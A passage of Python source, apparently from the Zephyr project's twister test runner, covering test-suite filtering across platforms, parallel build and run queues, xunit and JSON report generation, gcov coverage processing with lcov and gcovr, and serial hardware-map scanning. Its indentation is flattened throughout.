instance.metrics['ram_size'] = ts.get("ram_size", 0)
instance.metrics['rom_size'] = ts.get("rom_size",0)
status = ts.get('status', None)
reason = ts.get("reason", "Unknown")
if status in ["error", "failed"]:
instance.status = None
instance.reason = None
# test marked as passed (built only) but can run when
# --test-only is used. Reset status to capture new results.
elif status == 'passed' and instance.run and self.test_only:
instance.status = None
instance.reason = None
else:
instance.status = status
instance.reason = reason
for tc in ts.get('testcases', []):
identifier = tc['identifier']
tc_status = tc.get('status', None)
tc_reason = None
# we set reason only if status is valid, it might have been
# reset above...
if instance.status:
tc_reason = tc.get('reason')
if tc_status:
case = instance.set_case_status_by_name(identifier, tc_status, tc_reason)
case.duration = tc.get('execution_time', 0)
if tc.get('log'):
case.output = tc.get('log')
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testsuite_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
runnable = kwargs.get('runnable')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
emu_filter = kwargs.get('emulation_only')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
emulation_platforms = False
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter and not emu_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
elif emu_filter:
logger.info("Selecting emulation platforms per test case")
emulation_platforms = True
if platform_filter:
self.verify_platforms_existence(platform_filter, f"platform_filter")
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
elif emu_filter:
platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
elif arch_filter:
platforms = list(filter(lambda p: p.arch in arch_filter, self.platforms))
elif default_platforms:
platforms = list(filter(lambda p: p.default, self.platforms))
else:
platforms = self.platforms
logger.info("Building initial testsuite list...")
for ts_name, ts in self.testsuites.items():
if ts.build_on_all and not platform_filter:
platform_scope = self.platforms
elif ts.integration_platforms and self.integration:
self.verify_platforms_existence(
ts.integration_platforms, f"{ts_name} - integration_platforms")
platform_scope = list(filter(lambda item: item.name in ts.integration_platforms, \
self.platforms))
else:
platform_scope = platforms
integration = self.integration and ts.integration_platforms
# If there isn't any overlap between the platform_allow list and the platform_scope
# we set the scope to the platform_allow list
if ts.platform_allow and not platform_filter and not integration:
self.verify_platforms_existence(
ts.platform_allow, f"{ts_name} - platform_allow")
a = set(platform_scope)
b = set(filter(lambda item: item.name in ts.platform_allow, self.platforms))
c = a.intersection(b)
if not c:
platform_scope = list(filter(lambda item: item.name in ts.platform_allow, \
self.platforms))
# list of instances per testsuite, aka configurations.
instance_list = []
for plat in platform_scope:
instance = TestInstance(ts, plat, self.outdir)
if runnable:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
if runnable and self.duts:
for h in self.duts:
if h.platform == plat.name:
if ts.harness_config.get('fixture') in h.fixtures:
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (ts.type == "unit"):
# Discard silently
continue
if ts.modules and self.modules:
if not set(ts.modules).issubset(set(self.modules)):
discards[instance] = discards.get(instance, f"one or more required module not available: {','.join(ts.modules)}")
if runnable and not instance.run:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and ts.integration_platforms and plat.name not in ts.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if ts.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tag_filter and not ts.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testsuite tag filter")
if exclude_tag and ts.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testsuite exclude filter")
if testsuite_filter and ts_name not in testsuite_filter:
discards[instance] = discards.get(instance, "TestSuite name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testsuite arch filter")
if not force_platform:
if ts.arch_allow and plat.arch not in ts.arch_allow:
discards[instance] = discards.get(instance, "Not in test case arch allow list")
if ts.arch_exclude and plat.arch in ts.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if ts.platform_exclude and plat.name in ts.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if ts.toolchain_exclude and toolchain in ts.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if ts.platform_allow and plat.name not in ts.platform_allow:
discards[instance] = discards.get(instance, "Not in testsuite platform allow list")
if ts.platform_type and plat.type not in ts.platform_type:
discards[instance] = discards.get(instance, "Not in testsuite platform type list")
if ts.toolchain_allow and toolchain not in ts.toolchain_allow:
discards[instance] = discards.get(instance, "Not in testsuite toolchain allow list")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and "host" not in plat.supported_toolchains \
and ts.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < ts.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if ts.depends_on:
dep_intersection = ts.depends_on.intersection(set(plat.supported))
if dep_intersection != set(ts.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < ts.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
if set(plat.ignore_tags) & ts.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
if plat.only_tags and not set(plat.only_tags) & ts.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
test_configuration = ".".join([instance.platform.name,
instance.testsuite.id])
# skip quarantined tests
if test_configuration in self.quarantine and not self.quarantine_verify:
discards[instance] = discards.get(instance,
f"Quarantine: {self.quarantine[test_configuration]}")
# run only quarantined test to verify their statuses (skip everything else)
if self.quarantine_verify and test_configuration not in self.quarantine:
discards[instance] = discards.get(instance, "Not under quarantine")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testsuite
if not instance_list:
continue
# if twister was launched with no platform options at all, we
# take all default platforms
if default_platforms and not ts.build_on_all and not integration:
if ts.platform_allow:
a = set(self.default_platforms)
b = set(ts.platform_allow)
c = a.intersection(b)
if c:
aa = list(filter(lambda ts: ts.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list)
else:
instances = list(filter(lambda ts: ts.platform.default, instance_list))
self.add_instances(instances)
elif integration:
instances = list(filter(lambda item: item.platform.name in ts.integration_platforms, instance_list))
self.add_instances(instances)
elif emulation_platforms:
self.add_instances(instance_list)
for instance in list(filter(lambda inst: not inst.platform.simulation != 'na', instance_list)):
discards[instance] = discards.get(instance, "Not an emulated platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
remove_from_discards = [] # configurations to be removed from discards.
for instance in self.discards:
instance.reason = self.discards[instance]
# If integration mode is on all skips on integration_platforms are treated as errors.
if self.integration and instance.platform.name in instance.testsuite.integration_platforms \
and "Quarantine" not in instance.reason:
instance.status = "error"
instance.reason += " but is one of the integration platforms"
self.instances[instance.name] = instance
# Such configuration has to be removed from discards to make sure it won't get skipped
remove_from_discards.append(instance)
else:
instance.status = "filtered"
instance.add_missing_testscases(instance.status)
# Remove from discards configurations that must not be discarded
# (e.g. integration_platforms when --integration was used)
for instance in remove_from_discards:
del self.discards[instance]
self.filtered_platforms = set(p.platform.name for p in self.instances.values()
if p.status != "skipped" )
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, pipeline, build_only=False, test_only=False, retry_build_errors=False):
for instance in self.instances.values():
if build_only:
instance.run = False
no_retry_statuses = ['passed', 'skipped', 'filtered']
if not retry_build_errors:
no_retry_statuses.append("error")
if instance.status not in no_retry_statuses:
logger.debug(f"adding {instance.name}")
instance.status = None
if test_only and instance.run:
pipeline.put({"op": "run", "test": instance})
else:
pipeline.put({"op": "cmake", "test": instance})
def pipeline_mgr(self, pipeline, done_queue, lock, results):
while True:
try:
task = pipeline.get_nowait()
except queue.Empty:
break
else:
test = task['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors,
overflow_as_errors=self.overflow_as_errors,
suite_name_check=self.suite_name_check,
seed=self.seed
)
pb.process(pipeline, done_queue, task, lock, results)
return True
def execute(self, pipeline, done, results):
lock = Lock()
logger.info("Adding tasks to the queue...")
self.add_tasks_to_queue(pipeline, self.build_only, self.test_only,
retry_build_errors=self.retry_build_errors)
logger.info("Added initial list of jobs to queue")
processes = []
for job in range(self.jobs):
logger.debug(f"Launch process {job}")
p = Process(target=self.pipeline_mgr, args=(pipeline, done, lock, results, ))
processes.append(p)
p.start()
try:
for p in processes:
p.join()
except KeyboardInterrupt:
logger.info("Execution interrupted")
for p in processes:
p.terminate()
return results
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
@staticmethod
def xunit_testcase(eleTestsuite, name, classname, status, ts_status, reason, duration, runnable, stats, log, build_only_as_skip):
fails, passes, errors, skips = stats
if status in ['skipped', 'filtered']:
duration = 0
eleTestcase = ET.SubElement(
eleTestsuite, "testcase",
classname=classname,
name=f"{name}",
time=f"{duration}")
if status in ['skipped', 'filtered']:
skips += 1
# temporarily add build_only_as_skip to restore existing CI report behaviour
if ts_status == "passed" and not runnable:
tc_type = "build"
else:
tc_type = status
ET.SubElement(eleTestcase, 'skipped', type=f"{tc_type}", message=f"{reason}")
elif status in ["failed", "blocked"]:
fails += 1
el = ET.SubElement(eleTestcase, 'failure', type="failure", message=f"{reason}")
if log:
el.text = log
elif status == "error":
errors += 1
el = ET.SubElement(eleTestcase, 'error', type="failure", message=f"{reason}")
if log:
el.text = log
elif status == 'passed':
if not runnable and build_only_as_skip:
ET.SubElement(eleTestcase, 'skipped', type="build", message="built only")
skips += 1
else:
passes += 1
else:
if not status:
logger.debug(f"{name}: No status")
ET.SubElement(eleTestcase, 'skipped', type=f"untested", message="No results captured, testsuite misconfiguration?")
else:
logger.error(f"{name}: Unknown status '{status}'")
return (fails, passes, errors, skips)
# Generate a report with all testsuites instead of doing this per platform
def xunit_report_suites(self, json_file, filename):
json_data = {}
with open(json_file, "r") as json_results:
json_data = json.load(json_results)
env = json_data.get('environment', {})
version = env.get('zephyr_version', None)
eleTestsuites = ET.Element('testsuites')
all_suites = json_data.get("testsuites", [])
suites_to_report = all_suites
# do not create entry if everything is filtered out
if not self.detailed_skipped_report:
suites_to_report = list(filter(lambda d: d.get('status') != "filtered", all_suites))
for suite in suites_to_report:
duration = 0
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=suite.get("name"), time="0",
timestamp = self.timestamp,
tests="0",
failures="0",
errors="0", skipped="0")
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
ET.SubElement(eleTSPropetries, 'property', name="platform", value=suite.get("platform"))
ET.SubElement(eleTSPropetries, 'property', name="architecture", value=suite.get("arch"))
total = 0
fails = passes = errors = skips = 0
handler_time = suite.get('execution_time', 0)
runnable = suite.get('runnable', 0)
duration += float(handler_time)
ts_status = suite.get('status')
for tc in suite.get("testcases", []):
status = tc.get('status')
reason = tc.get('reason', suite.get('reason', 'Unknown'))
log = tc.get("log", suite.get("log"))
tc_duration = tc.get('execution_time', handler_time)
name = tc.get("identifier")
classname = ".".join(name.split(".")[:2])
fails, passes, errors, skips = self.xunit_testcase(eleTestsuite,
name, classname, status, ts_status, reason, tc_duration, runnable,
(fails, passes, errors, skips), log, True)
total = (errors + passes + fails + skips)
eleTestsuite.attrib['time'] = f"{duration}"
eleTestsuite.attrib['failures'] = f"{fails}"
eleTestsuite.attrib['errors'] = f"{errors}"
eleTestsuite.attrib['skipped'] = f"{skips}"
eleTestsuite.attrib['tests'] = f"{total}"
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
def xunit_report(self, json_file, filename, selected_platform=None, full_report=False):
if selected_platform:
selected = [selected_platform]
logger.info(f"Writing target report for {selected_platform}...")
else:
logger.info(f"Writing xunit report {filename}...")
selected = self.selected_platforms
json_data = {}
with open(json_file, "r") as json_results:
json_data = json.load(json_results)
env = json_data.get('environment', {})
version = env.get('zephyr_version', None)
eleTestsuites = ET.Element('testsuites')
all_suites = json_data.get("testsuites", [])
for platform in selected:
suites = list(filter(lambda d: d['platform'] == platform, all_suites))
# do not create entry if everything is filtered out
if not self.detailed_skipped_report:
non_filtered = list(filter(lambda d: d.get('status') != "filtered", suites))
if not non_filtered:
continue
duration = 0
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=platform,
timestamp = self.timestamp,
time="0",
tests="0",
failures="0",
errors="0", skipped="0")
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
total = 0
fails = passes = errors = skips = 0
for ts in suites:
handler_time = ts.get('execution_time', 0)
runnable = ts.get('runnable', 0)
duration += float(handler_time)
ts_status = ts.get('status')
# Do not report filtered testcases
if ts_status == 'filtered' and not self.detailed_skipped_report:
continue
if full_report:
for tc in ts.get("testcases", []):
status = tc.get('status')
reason = tc.get('reason', ts.get('reason', 'Unknown'))
log = tc.get("log", ts.get("log"))
tc_duration = tc.get('execution_time', handler_time)
name = tc.get("identifier")
classname = ".".join(name.split(".")[:2])
fails, passes, errors, skips = self.xunit_testcase(eleTestsuite,
name, classname, status, ts_status, reason, tc_duration, runnable,
(fails, passes, errors, skips), log, True)
else:
reason = ts.get('reason', 'Unknown')
name = ts.get("name")
classname = f"{platform}:{name}"
log = ts.get("log")
fails, passes, errors, skips = self.xunit_testcase(eleTestsuite,
name, classname, ts_status, ts_status, reason, duration, runnable,
(fails, passes, errors, skips), log, False)
total = (errors + passes + fails + skips)
eleTestsuite.attrib['time'] = f"{duration}"
eleTestsuite.attrib['failures'] = f"{fails}"
eleTestsuite.attrib['errors'] = f"{errors}"
eleTestsuite.attrib['skipped'] = f"{skips}"
eleTestsuite.attrib['tests'] = f"{total}"
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
def json_report(self, filename, version="NA"):
logger.info(f"Writing JSON report {filename}")
report = {}
report["environment"] = {"os": os.name,
"zephyr_version": version,
"toolchain": self.get_toolchain()
}
suites = []
for instance in self.instances.values():
suite = {}
handler_log = os.path.join(instance.build_dir, "handler.log")
build_log = os.path.join(instance.build_dir, "build.log")
device_log = os.path.join(instance.build_dir, "device.log")
handler_time = instance.metrics.get('handler_time', 0)
ram_size = instance.metrics.get ("ram_size", 0)
rom_size = instance.metrics.get("rom_size",0)
suite = {
"name": instance.testsuite.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
}
if instance.run_id:
suite['run_id'] = instance.run_id
suite["runnable"] = False
if instance.status != 'filtered':
suite["runnable"] = instance.run
if ram_size:
suite["ram_size"] = ram_size
if rom_size:
suite["rom_size"] = rom_size
if instance.status in ["error", "failed"]:
suite['status'] = instance.status
suite["reason"] = instance.reason
# FIXME
if os.path.exists(handler_log):
suite["log"] = self.process_log(handler_log)
elif os.path.exists(device_log):
suite["log"] = self.process_log(device_log)
else:
suite["log"] = self.process_log(build_log)
elif instance.status == 'filtered':
suite["status"] = "filtered"
suite["reason"] = instance.reason
elif instance.status == 'passed':
suite["status"] = "passed"
elif instance.status == 'skipped':
suite["status"] = "skipped"
suite["reason"] = instance.reason
if instance.status is not None:
suite["execution_time"] = f"{float(handler_time):.2f}"
testcases = []
if len(instance.testcases) == 1:
single_case_duration = f"{float(handler_time):.2f}"
else:
single_case_duration = 0
for case in instance.testcases:
testcase = {}
testcase['identifier'] = case.name
if instance.status:
if single_case_duration:
testcase['execution_time'] = single_case_duration
else:
testcase['execution_time'] = f"{float(case.duration):.2f}"
if case.output != "":
testcase['log'] = case.output
if case.status == "skipped":
if instance.status == "filtered":
testcase["status"] = "filtered"
else:
testcase["status"] = "skipped"
testcase["reason"] = case.reason or instance.reason
else:
testcase["status"] = case.status
if case.reason:
testcase["reason"] = case.reason
testcases.append(testcase)
suite['testcases'] = testcases
suites.append(suite)
report["testsuites"] = suites
with open(filename, "wt") as json_file:
json.dump(report, json_file, indent=4, separators=(',',':'))
def get_testsuite(self, identifier):
results = []
for _, ts in self.testsuites.items():
for case in ts.testcases:
if case == identifier:
results.append(ts)
return results
def verify_platforms_existence(self, platform_names_to_verify, log_info=""):
"""
Verify if platform name (passed by --platform option, or in yaml file
as platform_allow or integration_platforms options) is correct. If not -
log and raise error.
"""
for platform in platform_names_to_verify:
if platform in self.platform_names:
break
else:
logger.error(f"{log_info} - unrecognized platform - {platform}")
sys.exit(2)
def create_build_dir_links(self):
"""
Iterate through all no-skipped instances in suite and create links
for each one build directories. Those links will be passed in the next
steps to the CMake command.
"""
links_dir_name = "twister_links" # folder for all links
links_dir_path = os.path.join(self.outdir, links_dir_name)
if not os.path.exists(links_dir_path):
os.mkdir(links_dir_path)
for instance in self.instances.values():
if instance.status != "skipped":
self._create_build_dir_link(links_dir_path, instance)
def _create_build_dir_link(self, links_dir_path, instance):
"""
Create build directory with original "long" path. Next take shorter
path and link them with original path - create link. At the end
replace build_dir to created link. This link will be passed to CMake
command. This action helps to limit path length which can be
significant during building by CMake on Windows OS.
"""
os.makedirs(instance.build_dir, exist_ok=True)
link_name = f"test_{self.link_dir_counter}"
link_path = os.path.join(links_dir_path, link_name)
if os.name == "nt": # if OS is Windows
command = ["mklink", "/J", f"{link_path}", f"{instance.build_dir}"]
subprocess.call(command, shell=True)
else: # for Linux and MAC OS
os.symlink(instance.build_dir, link_path)
# Here original build directory is replaced with symbolic link. It will
# be passed to CMake command
instance.build_dir = link_path
self.link_dir_counter += 1
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
logger.debug(f"Select {tool} as the coverage tool...")
return t
@staticmethod
def retrieve_gcov_data(input_file):
logger.debug("Working on %s" % input_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(input_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# if kobject_hash is given for coverage gcovr fails
# hence skipping it problem only in gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append('*/' + pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
cmd = ["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(".*/" + pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
cmd = ["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes + ["--json", "-o",
coveragefile, outdir]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class DUT(object):
def __init__(self,
id=None,
serial=None,
serial_baud=None,
platform=None,
product=None,
serial_pty=None,
connected=False,
runner_params=None,
pre_script=None,
post_script=None,
post_flash_script=None,
runner=None):
self.serial = serial
self.baud = serial_baud or 115200
self.platform = platform
self.serial_pty = serial_pty
self._counter = Value("i", 0)
self._available = Value("i", 1)
self.connected = connected
self.pre_script = pre_script
self.id = id
self.product = product
self.runner = runner
self.runner_params = runner_params
self.fixtures = []
self.post_flash_script = post_flash_script
self.post_script = post_script
self.pre_script = pre_script
self.probe_id = None
self.notes = None
self.lock = Lock()
self.match = False
@property
def available(self):
with self._available.get_lock():
return self._available.value
@available.setter
def available(self, value):
with self._available.get_lock():
self._available.value = value
@property
def counter(self):
with self._counter.get_lock():
return self._counter.value
@counter.setter
def counter(self, value):
with self._counter.get_lock():
self._counter.value = value
def to_dict(self):
d = {}
exclude = ['_available', '_counter', 'match']
v = vars(self)
for k in v.keys():
if k not in exclude and v[k]:
d[k] = v[k]
return d
def __repr__(self):
return f"<{self.platform} ({self.product}) on {self.serial}>"
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.duts = []
def add_device(self, serial, platform, pre_script, is_pty, baud=None):
device = DUT(platform=platform, connected=True, pre_script=pre_script, serial_baud=baud)
if is_pty:
device.serial_pty = serial
else:
device.serial = serial
self.duts.append(device)
def load(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
duts = scl.yaml_load_verify(map_file, hwm_schema)
for dut in duts:
pre_script = dut.get('pre_script')
post_script = dut.get('post_script')
post_flash_script = dut.get('post_flash_script')
platform = dut.get('platform')
id = dut.get('id')
runner = dut.get('runner')
runner_params = dut.get('runner_params')
serial_pty = dut.get('serial_pty')
serial = dut.get('serial')
baud = dut.get('baud', None)
product = dut.get('product')
fixtures = dut.get('fixtures', [])
connected= dut.get('connected') and ((serial or serial_pty) is not None)
new_dut = DUT(platform=platform,
product=product,
runner=runner,
runner_params=runner_params,
id=id,
serial_pty=serial_pty,
serial=serial,
serial_baud=baud,
connected=connected,
pre_script=pre_script,
post_script=post_script,
post_flash_script=post_flash_script)
new_dut.fixtures = fixtures
new_dut.counter = 0
self.duts.append(new_dut)
def scan(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = DUT(platform="unknown",
id=d.serial_number,
serial=persistent_map.get(d.device, d.device),
product=d.product,
runner='unknown',
connected=True)
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev.runner = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev.runner = runner
s_dev.connected = True
s_dev.lock = None
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def save(self, hwm_file):
# use existing map
self.detected.sort(key=lambda x: x.serial or '')
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
if hwm:
hwm.sort(key=lambda x: x.get('serial', ''))
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for _detected in self.detected:
for h in hwm:
if _detected.id == h['id'] and _detected.product == h['product'] and not _detected.match:
h['connected'] = True
h['serial'] = _detected.serial
_detected.match = True
new_duts = list(filter(lambda d: not d.match, self.detected))
new = []
for d in new_duts:
new.append(d.to_dict())
if hwm:
hwm = hwm + new
else:
hwm = new
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
self.load(hwm_file)
logger.info("Registered devices:")
self.dump()
else:
# create new file
dl = []
for _connected in self.detected:
platform = _connected.platform
id = _connected.id
runner = _connected.runner
serial = _connected.serial
product = _connected.product
d = {
'platform': platform,
'id': id,
'runner': runner,
'serial': serial,
'product': product,
'connected': _connected.connected
}
dl.append(d)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(dl, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
